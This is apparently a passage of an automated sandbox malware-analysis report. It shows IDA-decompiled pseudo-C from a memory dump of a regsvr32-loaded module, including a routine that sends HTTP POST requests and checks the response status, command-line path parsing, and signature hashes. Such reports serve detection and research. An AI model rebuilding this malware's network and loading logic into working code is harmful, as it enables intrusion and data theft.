                                                                                                                                                                                              							__eflags = _a24;
                                                                                                                                                                                              							_t165 = _t111;
                                                                                                                                                                                              							if(_a24 != 0) {
                                                                                                                                                                                              								E04AFA065(_a24);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t165;
                                                                                                                                                                                              							if(_t165 != 0) {
                                                                                                                                                                                              								__eflags = _v104 - 4;
                                                                                                                                                                                              								_t112 = 0x8484f700;
                                                                                                                                                                                              								if(_v104 != 4) {
                                                                                                                                                                                              									_t112 = _v8;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t115 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
                                                                                                                                                                                              								_v8 = _t116;
                                                                                                                                                                                              								__eflags = _a24;
                                                                                                                                                                                              								if(_a24 != 0) {
                                                                                                                                                                                              									E04AFA065(_a24);
                                                                                                                                                                                              									_t116 = _v8;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t116;
                                                                                                                                                                                              								if(_t116 != 0) {
                                                                                                                                                                                              									__eflags = _v104 - 4;
                                                                                                                                                                                              									if(_v104 == 4) {
                                                                                                                                                                                              										E04AFF6EC(_t116);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t117 = E04AF9DD8(0x901);
                                                                                                                                                                                              									_t193 = _t117;
                                                                                                                                                                                              									_v16 = _t193;
                                                                                                                                                                                              									_t119 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              									_t194 = _v8;
                                                                                                                                                                                              									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E04AFA43D(_t193), _a4, _a8);
                                                                                                                                                                                              									E04AF8B9C( &_v16);
                                                                                                                                                                                              									__eflags = _a24;
                                                                                                                                                                                              									if(_a24 != 0) {
                                                                                                                                                                                              										E04AFA065(_a24);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _v8;
                                                                                                                                                                                              									if(_v8 != 0) {
                                                                                                                                                                                              										L25:
                                                                                                                                                                                              										_t122 = 8;
                                                                                                                                                                                              										_v24 = _t122;
                                                                                                                                                                                              										_v20 = 0;
                                                                                                                                                                                              										_v16 = 0;
                                                                                                                                                                                              										E04AF8D6D( &_v20, 0, _t122);
                                                                                                                                                                                              										_t127 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
                                                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                                                              											_t129 = E04AF9F6F( &_v20, __eflags);
                                                                                                                                                                                              											__eflags = _t129 - 0xc8;
                                                                                                                                                                                              											if(_t129 == 0xc8) {
                                                                                                                                                                                              												 *_a20 = _t194;
                                                                                                                                                                                              												 *_a12 = _t189;
                                                                                                                                                                                              												 *_a16 = _t165;
                                                                                                                                                                                              												__eflags = 0;
                                                                                                                                                                                              												return 0;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_v12 =  ~_t129;
                                                                                                                                                                                              											L29:
                                                                                                                                                                                              											_t135 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              											 *((intOrPtr*)(_t135 + 8))(_t194);
                                                                                                                                                                                              											_t195 = _v12;
                                                                                                                                                                                              											L30:
                                                                                                                                                                                              											__eflags = _t165;
                                                                                                                                                                                              											if(_t165 != 0) {
                                                                                                                                                                                              												_t139 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              												 *((intOrPtr*)(_t139 + 8))(_t165);
                                                                                                                                                                                              											}
                                                                                                                                                                                              											__eflags = _t189;
                                                                                                                                                                                              											if(_t189 != 0) {
                                                                                                                                                                                              												_t179 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              												 *((intOrPtr*)(_t179 + 8))(_t189);
                                                                                                                                                                                              											}
                                                                                                                                                                                              											return _t195;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										GetLastError();
                                                                                                                                                                                              										_v12 = 0xfffffff8;
                                                                                                                                                                                              										goto L29;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										GetLastError();
                                                                                                                                                                                              										_t143 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              										 *((intOrPtr*)(_t143 + 8))(_t194);
                                                                                                                                                                                              										_t145 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              										_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              										 *((intOrPtr*)(_t145 + 8))(_t165);
                                                                                                                                                                                              										_t147 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              										_t165 = 0;
                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                              										 *((intOrPtr*)(_t147 + 8))(_t189);
                                                                                                                                                                                              										_t194 = _v8;
                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									GetLastError();
                                                                                                                                                                                              									_t153 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              									 *((intOrPtr*)(_t153 + 8))(_t165);
                                                                                                                                                                                              									_t155 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              									_t165 = 0;
                                                                                                                                                                                              									 *((intOrPtr*)(_t155 + 8))(_t189);
                                                                                                                                                                                              									_t189 = 0;
                                                                                                                                                                                              									_t194 = _v8;
                                                                                                                                                                                              									goto L22;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								GetLastError();
                                                                                                                                                                                              								_t159 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              								 *((intOrPtr*)(_t159 + 8))(_t189);
                                                                                                                                                                                              								L21:
                                                                                                                                                                                              								_t189 = 0;
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              						L22:
                                                                                                                                                                                              						_t186 = _t194;
                                                                                                                                                                                              						_t104 = _v12 + 1;
                                                                                                                                                                                              						_v12 = _t104;
                                                                                                                                                                                              						__eflags = _t104 - 2;
                                                                                                                                                                                              					} while (_t104 < 2);
                                                                                                                                                                                              					__eflags = _t186;
                                                                                                                                                                                              					if(_t186 != 0) {
                                                                                                                                                                                              						goto L25;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t195 = 0xfffffffe;
                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t163 = 0xfffffffc;
                                                                                                                                                                                              				return _t163;
                                                                                                                                                                                              			}





























































                                                                                                                                                                                              0x04aff90c
                                                                                                                                                                                              0x04aff9fc
                                                                                                                                                                                              0x04aff9fc
                                                                                                                                                                                              0x04aff9fc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04aff9fc
                                                                                                                                                                                              0x04aff8fe
                                                                                                                                                                                              0x04aff8bf
                                                                                                                                                                                              0x04aff9fe
                                                                                                                                                                                              0x04affa01
                                                                                                                                                                                              0x04affa03
                                                                                                                                                                                              0x04affa06
                                                                                                                                                                                              0x04affa09
                                                                                                                                                                                              0x04affa09
                                                                                                                                                                                              0x04affa12
                                                                                                                                                                                              0x04affa14
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04affa18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04affa18
                                                                                                                                                                                              0x04aff88e
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 04AFF7D7
                                                                                                                                                                                              • memset.MSVCRT ref: 04AFF7E8
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 04AFF8BF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast
                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                              • API String ID: 2570506013-1814004025
                                                                                                                                                                                              • Opcode ID: 0f30b5b7058f8260c48a4f43e2bc3fee46c9556c66766167077f038186b65472
                                                                                                                                                                                              • Instruction ID: ac054949acd450b262af1751ae677f3a51238acd0103366dc81fa452b02a215e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f30b5b7058f8260c48a4f43e2bc3fee46c9556c66766167077f038186b65472
                                                                                                                                                                                              • Instruction Fuzzy Hash: 59A1EE71A00218AFDB25EFA4DC88AEE77B8FF48315F10406AF905E7250DB74AE45CB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _snprintfqsort
                                                                                                                                                                                              • String ID: %I64d$false$null$true
                                                                                                                                                                                              • API String ID: 756996078-4285102228
                                                                                                                                                                                              • Opcode ID: 9bdf4d37ff49ef9e340c02283e6abf5383c8c51123cb66f5deec32ef6b7c6026
                                                                                                                                                                                              • Instruction ID: 2fc20b9428ca5ec132f5d91263ad59d70c6d275990f17afa516cdc43276f38bd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bdf4d37ff49ef9e340c02283e6abf5383c8c51123cb66f5deec32ef6b7c6026
                                                                                                                                                                                              • Instruction Fuzzy Hash: D8E193B190020ABFEF199F58CC45EAF3F69EF45346F00C095FD159A1D1E632EA618BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E04AF50B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                                                                                                                                                                              				void _v532;
                                                                                                                                                                                              				char _v548;
                                                                                                                                                                                              				char _v580;
                                                                                                                                                                                              				char _v584;
                                                                                                                                                                                              				signed int _v588;
                                                                                                                                                                                              				intOrPtr _v592;
                                                                                                                                                                                              				WCHAR* _v596;
                                                                                                                                                                                              				char _v600;
                                                                                                                                                                                              				intOrPtr _v604;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                              				char _t63;
                                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              				void* _t77;
                                                                                                                                                                                              				signed int _t78;
                                                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                                                              				WCHAR* _t84;
                                                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                                                              				intOrPtr _t95;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                                                              				signed char _t104;
                                                                                                                                                                                              				void* _t107;
                                                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                                                              				intOrPtr _t110;
                                                                                                                                                                                              				void* _t113;
                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                              				WCHAR* _t115;
                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                              				WCHAR* _t130;
                                                                                                                                                                                              				intOrPtr _t142;
                                                                                                                                                                                              				void* _t143;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				signed int _t166;
                                                                                                                                                                                              				void* _t167;
                                                                                                                                                                                              				void* _t169;
                                                                                                                                                                                              				void* _t173;
                                                                                                                                                                                              				signed int _t174;
                                                                                                                                                                                              				WCHAR* _t176;
                                                                                                                                                                                              				signed int _t177;
                                                                                                                                                                                              				signed int _t178;
                                                                                                                                                                                              				intOrPtr* _t180;
                                                                                                                                                                                              				signed int _t182;
                                                                                                                                                                                              				void* _t185;
                                                                                                                                                                                              				void* _t186;
                                                                                                                                                                                              				WCHAR** _t187;
                                                                                                                                                                                              				void* _t192;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t192 = __fp0;
                                                                                                                                                                                              				_push(_t177);
                                                                                                                                                                                              				_t113 = __edx;
                                                                                                                                                                                              				_t173 = __ecx;
                                                                                                                                                                                              				_t178 = _t177 | 0xffffffff;
                                                                                                                                                                                              				memset( &_v532, 0, 0x20c);
                                                                                                                                                                                              				_v588 = _v588 & 0x00000000;
                                                                                                                                                                                              				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
                                                                                                                                                                                              				_v596 = 1;
                                                                                                                                                                                              				if(_t173 != 0) {
                                                                                                                                                                                              					_t108 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              					_t5 = _t108 + 0x110; // 0x4c316b8
                                                                                                                                                                                              					_t110 =  *0x4b0f820; // 0x4c2faa0
                                                                                                                                                                                              					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(E04AFC9F4(_t173) != 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					_t56 = E04AFC6CE();
                                                                                                                                                                                              					_push(_t113);
                                                                                                                                                                                              					_v592 = _t56;
                                                                                                                                                                                              					E04AFC4C1(_t56,  &_v580, _t190, _t192);
                                                                                                                                                                                              					_t114 = E04AF5072( &_v580,  &_v580, _t190);
                                                                                                                                                                                              					_t126 = E04AFE2C5( &_v580, E04AFA43D( &_v580), 0);
                                                                                                                                                                                              					E04AFC6E4(_t126,  &_v548, _t192);
                                                                                                                                                                                              					_push(_t126);
                                                                                                                                                                                              					_t161 =  &_v580;
                                                                                                                                                                                              					_t63 = E04AF317E(_t173,  &_v580, _t190, _t192);
                                                                                                                                                                                              					_v600 = _t63;
                                                                                                                                                                                              					if(_t63 != 0) {
                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                              						_push(_t114);
                                                                                                                                                                                              						_push(0x4b0c9a0);
                                                                                                                                                                                              						_t115 = E04AF9A5A(_t63);
                                                                                                                                                                                              						_t186 = _t185 + 0x10;
                                                                                                                                                                                              						_t65 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
                                                                                                                                                                                              						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
                                                                                                                                                                                              							L12:
                                                                                                                                                                                              							__eflags = _v596;
                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                              								_t66 = E04AF98BD(_v600);
                                                                                                                                                                                              								_t130 = _t115;
                                                                                                                                                                                              								 *0x4b0f8d8 = _t66;
                                                                                                                                                                                              								 *0x4b0f8d0 = E04AF98BD(_t130);
                                                                                                                                                                                              								L17:
                                                                                                                                                                                              								_push(_t130);
                                                                                                                                                                                              								_t174 = E04AFA633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
                                                                                                                                                                                              								_t187 = _t186 + 0x10;
                                                                                                                                                                                              								__eflags = _t174;
                                                                                                                                                                                              								if(_t174 == 0) {
                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_push(0x4b0c9f2);
                                                                                                                                                                                              								_t163 = 0xe;
                                                                                                                                                                                              								E04AFAAA3(_t163, _t192);
                                                                                                                                                                                              								E04AFAADC(_t174, _t192, _t115);
                                                                                                                                                                                              								_t180 = _a4;
                                                                                                                                                                                              								_push( *_t180);
                                                                                                                                                                                              								E04AFAA7E(0xb);
                                                                                                                                                                                              								_t165 =  *(_t180 + 0x10);
                                                                                                                                                                                              								__eflags =  *(_t180 + 0x10);
                                                                                                                                                                                              								if( *(_t180 + 0x10) != 0) {
                                                                                                                                                                                              									E04AFB025(_t165, _t192);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t166 =  *(_t180 + 0xc);
                                                                                                                                                                                              								__eflags = _t166;
                                                                                                                                                                                              								if(_t166 != 0) {
                                                                                                                                                                                              									E04AFB025(_t166, _t192);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t76 = E04AFA065(0);
                                                                                                                                                                                              								_push(_t166);
                                                                                                                                                                                              								_t167 = 2;
                                                                                                                                                                                              								_t77 = E04AFAA50();
                                                                                                                                                                                              								__eflags = _v596;
                                                                                                                                                                                              								_t142 = _t76;
                                                                                                                                                                                              								if(_v596 == 0) {
                                                                                                                                                                                              									_t142 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
                                                                                                                                                                                              									if(__eflags != 0) {
                                                                                                                                                                                              										_t78 = E04B00D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
                                                                                                                                                                                              										_t187 =  &(_t187[3]);
                                                                                                                                                                                              										goto L26;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t142 = _t142 + 0x228;
                                                                                                                                                                                              									goto L25;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t79 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
                                                                                                                                                                                              									if(__eflags != 0) {
                                                                                                                                                                                              										L32:
                                                                                                                                                                                              										__eflags =  *(_t79 + 0x1898) & 0x00000082;
                                                                                                                                                                                              										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
                                                                                                                                                                                              											_t169 = 0x64;
                                                                                                                                                                                              											E04AFF0DE(_t169);
                                                                                                                                                                                              										}
                                                                                                                                                                                              										E04AF584B( &_v580, _t192);
                                                                                                                                                                                              										_t176 = _a8;
                                                                                                                                                                                              										_t143 = _t142;
                                                                                                                                                                                              										__eflags = _t176;
                                                                                                                                                                                              										if(_t176 != 0) {
                                                                                                                                                                                              											_t82 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
                                                                                                                                                                                              											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
                                                                                                                                                                                              												lstrcpyW(_t176, _t115);
                                                                                                                                                                                              											} else {
                                                                                                                                                                                              												_t84 = E04AF109A(_t143, 0x49f);
                                                                                                                                                                                              												_v596 = _t84;
                                                                                                                                                                                              												lstrcpyW(_t176, _t84);
                                                                                                                                                                                              												E04AF8BAF( &_v596);
                                                                                                                                                                                              												 *_t187 = 0x4b0c9b0;
                                                                                                                                                                                              												lstrcatW(_t176, ??);
                                                                                                                                                                                              												lstrcatW(_t176, _t115);
                                                                                                                                                                                              												lstrcatW(_t176, 0x4b0c9b0);
                                                                                                                                                                                              											}
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t81 = _a12;
                                                                                                                                                                                              										__eflags = _t81;
                                                                                                                                                                                              										if(_t81 != 0) {
                                                                                                                                                                                              											 *_t81 = _v592;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t178 = 0;
                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                              										goto L41;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t40 = _t79 + 0x228; // 0x4c2fe10
                                                                                                                                                                                              									_t142 = _t40;
                                                                                                                                                                                              									L25:
                                                                                                                                                                                              									_t78 = E04AF5AC0(_t142, _t115, __eflags);
                                                                                                                                                                                              									L26:
                                                                                                                                                                                              									__eflags = _t78;
                                                                                                                                                                                              									if(_t78 >= 0) {
                                                                                                                                                                                              										_t79 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              										goto L32;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_push(0xfffffffd);
                                                                                                                                                                                              									L6:
                                                                                                                                                                                              									_pop(_t178);
                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t94 = E04AFD11F(_v592, __eflags);
                                                                                                                                                                                              							_v600 = _t94;
                                                                                                                                                                                              							_t95 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                                                                                                                                                                              							__eflags = _t96 - _t178;
                                                                                                                                                                                              							if(_t96 != _t178) {
                                                                                                                                                                                              								_t97 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              								 *((intOrPtr*)(_t97 + 0x30))();
                                                                                                                                                                                              								E04AF8BF4( &_v636, _t178);
                                                                                                                                                                                              								_t130 = _t96;
                                                                                                                                                                                              								goto L17;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							E04AF8BF4( &_v632, _t178);
                                                                                                                                                                                              							_t72 = 1;
                                                                                                                                                                                              							goto L42;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t18 = _t65 + 0x1898; // 0x0
                                                                                                                                                                                              						_t104 =  *_t18;
                                                                                                                                                                                              						__eflags = _t104 & 0x00000004;
                                                                                                                                                                                              						if((_t104 & 0x00000004) == 0) {
                                                                                                                                                                                              							__eflags = _t104;
                                                                                                                                                                                              							if(_t104 != 0) {
                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L11:
                                                                                                                                                                                              							E04AFF1F6(_v600, _t161);
                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E04AFF1B6(_v600,  &_v580);
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0xfffffffe);
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t107 = E04AF3097( &_v532, _t178, 0x105);
                                                                                                                                                                                              					_t190 = _t107;
                                                                                                                                                                                              					if(_t107 == 0) {
                                                                                                                                                                                              						L41:
                                                                                                                                                                                              						E04AF5F6F( &_v588);
                                                                                                                                                                                              						_t72 = _t178;
                                                                                                                                                                                              						L42:
                                                                                                                                                                                              						return _t72;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


























































                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af5238
                                                                                                                                                                                              0x04af5214
                                                                                                                                                                                              0x04af521d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af521d
                                                                                                                                                                                              0x04af51b1
                                                                                                                                                                                              0x04af51b1
                                                                                                                                                                                              0x04af51b7
                                                                                                                                                                                              0x04af51b9
                                                                                                                                                                                              0x04af51c6
                                                                                                                                                                                              0x04af51c8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af51ca
                                                                                                                                                                                              0x04af51ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af51ce
                                                                                                                                                                                              0x04af51bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af51bf
                                                                                                                                                                                              0x04af5188
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af5113
                                                                                                                                                                                              0x04af511e
                                                                                                                                                                                              0x04af5124
                                                                                                                                                                                              0x04af5126
                                                                                                                                                                                              0x04af53b5
                                                                                                                                                                                              0x04af53b9
                                                                                                                                                                                              0x04af53be
                                                                                                                                                                                              0x04af53c0
                                                                                                                                                                                              0x04af53c6
                                                                                                                                                                                              0x04af53c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af5126

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1985475764-0
                                                                                                                                                                                              • Opcode ID: a50b622f3b057ead417675c20d6924b0c301a67212178b1a1e1809c044581a87
                                                                                                                                                                                              • Instruction ID: c11c711f1d68dea59ad9cf3dde6efb20b474a3c83a23ff2dd2895087d255f734
                                                                                                                                                                                              • Opcode Fuzzy Hash: a50b622f3b057ead417675c20d6924b0c301a67212178b1a1e1809c044581a87
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A81F371B04300ABE724EFA4DD44BBF73E9EB80314F14462EF6558B291EBB4B8458A91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E04AFDE26(WCHAR* __ecx) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				WCHAR* _v12;
                                                                                                                                                                                              				WCHAR* _v16;
                                                                                                                                                                                              				WCHAR* _v140;
                                                                                                                                                                                              				WCHAR* _v144;
                                                                                                                                                                                              				short _v664;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                              				signed int _t30;
                                                                                                                                                                                              				WCHAR* _t36;
                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                              				signed int _t41;
                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                              				WCHAR* _t49;
                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                              				WCHAR* _t52;
                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                              				_t51 = 0;
                                                                                                                                                                                              				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                                              				_t44 = _v8;
                                                                                                                                                                                              				_t41 = 0;
                                                                                                                                                                                              				_v12 = _t28;
                                                                                                                                                                                              				if(_t44 <= 0) {
                                                                                                                                                                                              					L22:
                                                                                                                                                                                              					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                                              					__eflags = _t29;
                                                                                                                                                                                              					return _t29;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					L1:
                                                                                                                                                                                              					_t49 =  *(_t28 + _t41 * 4);
                                                                                                                                                                                              					_t30 =  *_t49 & 0x0000ffff;
                                                                                                                                                                                              					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                                                                                                              						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                                                                                                              						_t40 = lstrlenW(_t49);
                                                                                                                                                                                              						_t45 = 0;
                                                                                                                                                                                              						if(_t40 <= 0) {
                                                                                                                                                                                              							L11:
                                                                                                                                                                                              							_t44 = _v8;
                                                                                                                                                                                              							_t51 = _t51 + 1;
                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							L8:
                                                                                                                                                                                              							if(_t49[_t45] == 0x2c) {
                                                                                                                                                                                              								_t49[_t45] = 0;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t45 = _t45 + 1;
                                                                                                                                                                                              						} while (_t45 < _t40);
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              					_t28 = _v12;
                                                                                                                                                                                              					_t41 = _t41 + 1;
                                                                                                                                                                                              				} while (_t41 < _t44);
                                                                                                                                                                                              				if(_t51 != 1) {
                                                                                                                                                                                              					if(__eflags <= 0) {
                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t52 = _v140;
                                                                                                                                                                                              					L17:
                                                                                                                                                                                              					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                                                                                                              						lstrcpynW(_v16, _t52, 0x104);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                              						_push(_t52);
                                                                                                                                                                                              						_push(0x4b0c9a0);
                                                                                                                                                                                              						_t36 = E04AF9A5A( &_v664);
                                                                                                                                                                                              						_v12 = _t36;
                                                                                                                                                                                              						lstrcpynW(_v16, _t36, 0x104);
                                                                                                                                                                                              						E04AF8BF4( &_v12, 0xfffffffe);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t52 = _v144;
                                                                                                                                                                                              				goto L17;
                                                                                                                                                                                              			}






















                                                                                                                                                                                              APIs
